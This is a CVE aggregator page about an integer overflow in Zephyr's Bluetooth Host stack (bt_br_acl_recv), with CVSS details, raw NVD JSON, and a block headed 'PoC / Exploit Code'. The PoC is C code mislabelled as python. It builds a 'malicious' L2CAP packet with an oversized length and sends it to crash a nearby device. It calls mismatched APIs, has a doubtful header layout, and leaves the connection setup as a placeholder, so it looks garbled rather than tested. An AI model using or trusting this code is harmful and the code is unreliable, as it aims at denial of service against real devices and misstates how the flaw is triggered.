Security Vulnerability Report
中文
CVE-2025-12035 CVSS 6.5 MEDIUM

CVE-2025-12035

Published: 2025-12-15 20:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An integer overflow condition exists in Bluetooth Host stack, within the bt_br_acl_recv routine a critical path for processing inbound BR/EDR L2CAP traffic.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Zephyr Project RTOS (受影响版本需参考官方安全公告)
使用Zephyr Bluetooth Host Stack的设备 (启用BR/EDR L2CAP功能)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-12035 PoC - Integer overflow in Zephyr bt_br_acl_recv // This PoC demonstrates the vulnerability concept (for educational purposes only) #include <stdio.h> #include <stdint.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/l2cap.h> // Malicious L2CAP packet with oversized length field uint8_t malicious_l2cap_packet[] = { // L2CAP Header 0x02, 0x00, // Connection-oriented channel ID 0xFF, 0xFF, // Length field: 0xFFFF - triggers overflow when processed // Payload that will be processed with wrong length 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00 }; void send_malicious_packet(int sock) { printf("[*] Sending malicious L2CAP packet with oversized length...\n"); printf("[*] Length field: 0xFFFF (65535)\n"); printf("[*] This may cause integer overflow in bt_br_acl_recv\n"); // Send the crafted packet send(sock, malicious_l2cap_packet, sizeof(malicious_l2cap_packet), 0); printf("[+] Packet sent. Monitor target for crash or unexpected behavior.\n"); } int main() { printf("CVE-2025-12035 PoC - Zephyr bt_br_acl_recv Integer Overflow\n"); printf("Target: Zephyr Project Bluetooth Host Stack\n"); printf("Vulnerable Function: bt_br_acl_recv\n\n"); // Initialize Bluetooth connection to target int bt_sock = bt_hci_open_dev(0); if (bt_sock < 0) { fprintf(stderr, "[-] Failed to open Bluetooth device\n"); return 1; } // Connect to target device (must be in range) // ... connection setup code ... send_malicious_packet(bt_sock); bt_hci_close_dev(bt_sock); return 0; } // Note: Actual exploitation requires: // 1. Proximity to target (Bluetooth range) // 2. Active BR/EDR connection to target // 3. Knowledge of target's Bluetooth address

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12035", "sourceIdentifier": "[email protected]", "published": "2025-12-15T20:15:48.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An integer overflow condition exists in Bluetooth Host stack, within the bt_br_acl_recv routine a critical path for processing inbound BR/EDR L2CAP traffic."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p793-3456-h7w3", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.